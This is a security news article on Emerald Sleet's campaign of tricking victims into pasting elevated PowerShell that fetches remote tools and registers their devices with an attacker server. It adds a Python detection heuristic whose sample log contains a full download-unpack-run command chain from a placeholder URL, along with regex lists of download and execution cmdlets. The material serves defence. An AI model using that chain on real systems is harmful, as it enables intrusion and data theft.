Microsoft Threat Intelligence has exposed a novel cyberattack method employed by the North Korean state-sponsored hacking group, Emerald Sleet (also known as Kimsuky or VELVET CHOLLIMA).
The group is exploiting social engineering tactics to deceive individuals into running PowerShell commands with administrative privileges, allowing them to infiltrate systems and pilfer critical information.
Emerald Sleet’s new strategy involves impersonating South Korean government officials to build trust with their victims.
Once the targets are sufficiently duped, the attackers send spear-phishing emails containing PDF attachments.
These documents instruct recipients to click a URL for “device registration” to access the content.
The so-called registration process is sinister in its simplicity. Victims are directed to open PowerShell as administrator and paste in a code snippet supplied by the attackers.
According to a Microsoft post on X, the PowerShell code downloads malicious tools, including a browser-based remote desktop application and a certificate file with a hardcoded PIN, from a remote server.
When the code is executed, it registers the victim’s device with the attackers’ remote server using the certificate and PIN.
This access enables Emerald Sleet to exploit the compromised systems, engaging in espionage and data theft.
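The chain described above (an elevated PowerShell session that fetches a payload from a remote server, unpacks or launches it, and passes certificate and PIN material on the command line) leaves a distinctive footprint in PowerShell script-block logging (Event ID 4104). The following scoring heuristic is an added example written for this article, not Microsoft's detection logic; the log records, host names, URL and file names are constructed.

```python
import re

# Constructed sample script-block records (Event ID 4104 style); not real telemetry.
# "elevated" stands in for the token-elevation field a SIEM would join in.
SAMPLE_EVENTS = [
    {"host": "WS-01", "user": "alice", "elevated": True,
     "script": ("$u='http://placeholder.invalid/reg.zip'; Invoke-WebRequest -Uri $u "
                "-OutFile $env:TEMP\\reg.zip; Expand-Archive $env:TEMP\\reg.zip $env:TEMP\\reg; "
                "Start-Process $env:TEMP\\reg\\agent.exe -ArgumentList '--cert client.pfx --pin 123456'")},
    {"host": "WS-02", "user": "bob", "elevated": False,
     "script": "Get-ChildItem C:\\Users\\bob\\Documents | Measure-Object"},
    {"host": "WS-03", "user": "carol", "elevated": True,
     "script": "Get-Service | Where-Object Status -eq 'Running'"},
]

# Indicator families, case-insensitive: remote download cradles, execution/unpacking,
# and certificate or PIN material appearing in the command text.
DOWNLOAD = re.compile(r"Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|WebClient|"
                      r"DownloadString|DownloadFile|Start-BitsTransfer|\bcurl\b|\bwget\b", re.I)
EXECUTE = re.compile(r"Start-Process|Invoke-Expression|\biex\b|Expand-Archive|Invoke-Item", re.I)
CREDENTIAL = re.compile(r"\.pfx\b|\.p12\b|\.pem\b|\bpin\b|certutil", re.I)


def score_event(ev):
    """Return (score, reasons) for one script-block record. A score of 3 or more
    means the block downloaded and ran something, or did one of those while elevated."""
    reasons = []
    script = ev["script"]
    if ev["elevated"]:
        reasons.append("elevated PowerShell session")
    if DOWNLOAD.search(script):
        reasons.append("remote download cradle")
    if EXECUTE.search(script):
        reasons.append("launches or unpacks downloaded content")
    if CREDENTIAL.search(script):
        reasons.append("certificate/PIN material in command text")
    score = len(reasons)
    # Download and execute in the same block is the core of the pattern; weight it extra.
    if "remote download cradle" in reasons and "launches or unpacks downloaded content" in reasons:
        score += 1
    return score, reasons


def triage(events, threshold=3):
    """Map host -> (score, reasons) for every record at or above the threshold."""
    return {ev["host"]: score_event(ev) for ev in events if score_event(ev)[0] >= threshold}


if __name__ == "__main__":
    for host, (score, reasons) in triage(SAMPLE_EVENTS).items():
        print(host, score, "; ".join(reasons))
```

Routine elevated administration (WS-03) stays below the threshold because elevation alone scores 1; the paste-and-run chain (WS-01) hits every family and is the only host returned.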
As per the Cyber Security News report, Microsoft notes that this attack method has been observed in limited cases since January 2025, reflecting a calculated evolution in Emerald Sleet’s approach.
The group’s primary targets include individuals in international affairs, especially those linked to Northeast Asia, as well as NGOs, government agencies, media outlets, and other organizations spanning North America, South America, Europe, and East Asia.
Emerald Sleet’s objectives are believed to focus heavily on traditional espionage activities.
Microsoft has been proactive in notifying affected individuals and organizations. Its Defender XDR platform can detect and mitigate this threat. To combat such attacks, Microsoft has advised organizations to:
This cyberattack highlights the importance of staying vigilant against evolving threats. Emerald Sleet’s manipulation of administrative PowerShell commands underscores how attackers continue to refine their methods to exploit human and technical vulnerabilities.
Organizations and individuals involved in sensitive international matters must prioritize robust cybersecurity measures to protect against such sophisticated campaigns.